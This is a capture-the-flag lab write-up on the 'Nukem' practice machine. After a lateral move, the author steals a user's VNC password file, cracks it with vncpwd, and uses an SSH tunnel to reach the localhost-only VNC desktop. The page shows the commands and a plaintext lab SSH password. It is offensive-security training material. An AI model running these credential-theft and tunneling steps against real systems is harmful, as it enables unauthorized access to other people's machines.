InfoSec LAB

Nukem_VNC

Created: 2 min read

VNC

The presence of a VNC instance was initially discovered by enumerating the network. Enumerating the processes further revealed that the VNC instance is initiated by the commander user. Additionally, PEAS flagged it at a later stage.

Now that I have made the lateral movement to the commander user, I can get to the enumeration

[commander@nukem ~]$ ll .vnc
total 20K
4.0K -rw-r--r--  1 commander commander 3.4K Jan 30 07:49 nukem:1.log
4.0K drwxr-xr-x 10 commander commander 4.0K Jan 30 07:49 ..
4.0K drwxr-xr-x  2 commander root      4.0K Sep 18  2020 .
4.0K -rw-------  1 commander commander    8 Sep 18  2020 passwd
4.0K -rw-r--r--  1 commander root        54 Sep 18  2020 config

Checking the .vnc directory reveals the passswd file along with the configuration and log files

passwd

[commander@nukem ~]$ cat .vnc/passwd
��0�g�

The passwd file is always encrypted.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nukem]
└─$ sshpass -p CommanderKeenVorticons1990 scp commander@$IP:~/.vnc/passwd .

I will grab that

Password Cracking

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nukem]
└─$ vncpwd passwd 
Password: Commande

Using the vncpwd tool, I can crack the passwd file It’s Commande

config

[commander@nukem ~]$ cat .vnc/config 
session=xfce
geometry=1024x728
localhost
alwaysshared

Session is set to xfce and it’s only reachable from localhost Since the service is running on the 127.0.0.1 address, I have no way of accessing the VNC server A tunneling is required

SSH Tunneling

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nukem]
└─$ sshpass -p CommanderKeenVorticons1990 ssh -f -N -L 5901:127.0.0.1:5901 commander@$IP

Tunneling Kali’s port 5901 to the target system’s 127.0.0.1:5901 socket via SSH

Starting A VNC Session

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nukem]
└─$ vncviewer -passwd ./passwd localhost:5901
Connected to RFB server, using protocol version 3.8
Performing standard VNC authentication
Authentication successful
Desktop name "nukem:1 (commander)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

Session established Nothing’s happening, but I can attempt to [[Nukem_Privilege_Escalation#|leverage]] the SUID dosbox binary

Interactive Graph View

Backlinks